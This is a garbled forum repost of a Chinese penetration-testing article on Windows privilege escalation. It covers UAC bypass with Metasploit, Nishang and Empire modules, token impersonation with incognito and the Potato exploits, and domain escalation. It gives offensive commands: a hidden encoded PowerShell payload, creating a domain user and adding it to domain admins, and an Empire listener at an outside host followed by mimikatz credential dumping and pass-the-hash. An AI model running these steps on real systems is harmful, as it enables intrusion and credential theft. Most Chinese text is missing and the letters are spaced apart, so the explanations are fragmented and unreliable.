[17029] 2021-07-15_内网渗透基石篇--权限提升

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-07-15_内网渗透基石篇--权限提升 - - F r e e B u f   2 0 2 1 - 0 7 - 1 5 ʀ ʏ ʜ ɪ ɴ ɢ   ɪ ʟ ʟ   ʙ       便 便   U A C 1 . ( U s e r   A c c o u n t   C o n t r o l )   W i n d o w s   V i s t a w i n d o w s   V I s t a 访 w i n d o w s P r o g r a m   F I l e s   U A C   w i n d o w s   u p d a t e / U A C A c t i v e X / / P r o g r a m   F I l e s W I n d o w s   U A C 使 U A C W i n d o w s 使 使 ( ) U A C 使   U A C   c o n s e n t . e x e c r e a t   p r o c e s s c m d l i n e L P C a p p i n f o R A i L u a n c h A d m i n P r o c e s s c o n s e n t . e x e U A C U A C
U A C S Y S T E M C r e a t e P r o c e s s A s U s e r U A C ,   使 2   b y p a s s u s a c   1 . e x e b a t B y p a s s U A C 2 . 1 w i n 7   / 1 9 2 . 1 6 8 . 0 . 8 k a l i 1 9 2 . 1 6 8 . 0 . 1 1 . i p 2 . 使 e x p l o i t / w i n d o w s / l o c a l / b y p a s s u a c 3 . p a y l o a d 4 . u i d
3   R u n A S 1 . 使 w i n d o w s / l o c a l / a s k 2 . 3 . u i d
4 . U A C U A C 使 使 使 U A C . N i s h a n g   I n v o P s U A C m e h t t p s : / / g i t h u b . c o m / s a m r a t a s h o k / n i s h a n g n i s h a n g U A C 使 s y s p r e p P a y l o a d p o w e r s h e l l I n v o k e - P s U A C m e   - V e r b o s e I n v o k e - P s U A C m e / / 使 o o b e P a y l o a d I n v o k e - P s U A C m e   - m e t h o d   o o b e   - V e r b o s e
. E m p i r e   b y p a s s u a c 1 . b y p a s s u a c u s e m o d u l e   p r i v e s e c / b y p a s s u a c s e t   L i n s t e n e r   s h u t e e r e x e x u t e 2 . b y p a s s u a c _ w s c r i p t 使 p a y l o a d U A C P a y l o a d w i n 7 使 3 . U A C D L L C L R C O M w u s a e x t r a c t   U A C I s e c u r i t y E d i t o r   C O M U A C I n v o k e - P s U A C m e   - m e t h o d   o o b e   - V e r b o s e / / 使 - P a y l o a d P a y l o a d I n v o k e - P s U A C m e   - m e t h o d   o o b e   - P a y l o a d   " p o w e r s h e l l   - w i n d o w s t y l e   h i d d e n   - e   Y o u r E n c o d e d P a y l o a d " C : W i n d o w s w s c r i p t . e x e u s e m o d u l e   p r i v e s c / b y p a s s u a c _ w s c r i p t s e t   L i s t e n e r   s h u t e e r e x e c u t e
U A C W i n d o w s   .   访 访 访 . K e r b e r o s K e r v e r o s / 1 . , 2 . T i c k e t ( ) ( S e s s i o n   K e y ) 使 3 . T i c k e t , 1 . W i n d o w s 访 使 便 T o k e n ( t o k e n ) 访 访 ( A c c e s s   T o k e n ) :   访 ( S e s s i o n   T o k e n ) :  
( S e c u r i t y   T o k e n ) :   U W i n d o w s 访 访 W i n d o w s   访 访 ( A c c e s s   T o k e n s )   线 线 线 线 访 访 访 访 访 访 线 线 线 线 访 线 线 线 线 使 访 访 线 使 访 访 ( S I D ) S I D s l o g o n   S I D S I D S I D s e c u r a b l e   o b j e c t 使 访 D A C L 访 p r i m a r y i m p e r s o n a t i o n   t o k e n S I D s i m p e r s o n a t i o n 使 访 使 访 使 使 W i n d o w s   A P I 访 访 使 使 S Y S T E M 使 使 s y s t e m a d m i n i s t r a t o r
W i n d o w s A c c e s s   T o k e n D e l e g a t i o n   T o k e n :   ( 访 ) I m p r e s o n a t i o n   T o k e n :   , ( 使 n e t   u s e 访 ) 访 访 a d m i n i s t r a t o r s e s s i o n u s e   i n c o g n i t o l i s t _ t o k e n s   - u s y s t e m w h o a m i s y s t e m N T   A U T H O R I T Y L O C A L   S E R V I C E N T   A U T H O R I T Y N E T W O R K   S E R V I C E N T   A U T H O R I T Y S Y S T E M W I N - D 2 G N 1 O U F T M B a i l x 0 4 N T   A U T H O R I T Y A N O N Y M O U S   L O G O i m p e r s o n a t e _ t o k e n   W I N - D 2 G N 1 O U F T M B a d m i n
2 .   R o t t e n   P o t a t o   R o t t e n   P o t a t o u s e i n c o g n i t o l i s t _ t o k e n s   - u , R o t t e n P o t a t o r o t t e n p o t a t o . e x e ,   r o t t e n p o t a t o c x e   P o t a t o   D C O M   C A L L   使   N T L M   R o t t e n   P o t a t o     J u i c y   P o t a t o   使   D C O M     S y s t e m   B I T S   使   D C O M     T C P     N T L M   L o c a l S e r v i c e     S e I m p e r s o n a t e     S e A s s i g n P r i m a r y T o k e n     S e I m p e r s o n a t e     C r e a t e P r o c e s s W i t h T o k e n     T o k e n     S e A s s i g n P r i m a r y T o k e n     C r e a t e P r o c e s s A s U s e r     T o k e n   3  
n e t   u s e r   s e c   1 2 3 4 5 6 B o   / a d   / d o m a i n   # 2 n e t   g r o u p   d o m a i n   a d m i n s   s e c   / a d   / d o m a i n   # 3 n e t g r o u p   d o m a i n   a d m i n s   / d o m a i n   # 4 5 m e t e r p r e t e r 使 i n c o g n i t o 6 a d d _ u s e r   s e c   1 2 3 4 5 B o   - h   1 . 1 . 1 . 8 7 n e t   g r o u p   d o m a i n   a d m i n s   s e c - h   1 . 1 . 1 . 8 4 . E m p i r e   E m p i r e :   l i s t e n e r s )   >   u s e l i s t e n e r   h t t p 2 ( E m p i r e :   l i s t e n e r s / h t t p )   >   i n f o 3 ( E m p i r e :   l i s t e n e r s / h t t p )   >   s e t   H o s t   h t t p : / / 1 . 1 . 1 . 6 4 ( E m p i r e :   l i s t e n e r s / h t t p )   >   s e t   P o r t   8 8 8 8 5 ( E m p i r e :   l i s t e n e r s / h t t p )   >   s e t   N a m e   s e c 6 ( E m p i r e :   l i s t e n e r s / h t t p )   >   e x e c u t e 7 ( E m p i r e :   l i s t e n e r s )   >   l a u n c h e r   p o w e r s h e l l   s e c 8 9 ( E m p i r e :   a g e n t s )   >   i n t e r a c t   N 7 8 Z 9 6 5 3 1 0 ( E m p i r e :   N 7 8 Z 9 6 5 3 )   >   m i m i k a t z 1 1 ( E m p i r e :   N 7 8 Z 9 6 5 3 )   >   c r e d s 1 2 ( E m p i r e :   N 7 8 Z 9 6 5 3 )   >   p t h   2 1 3 ( E m p i r e :   N 7 8 Z 9 6 5 3 )   >   r e v t o s e l f   # 5 .
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则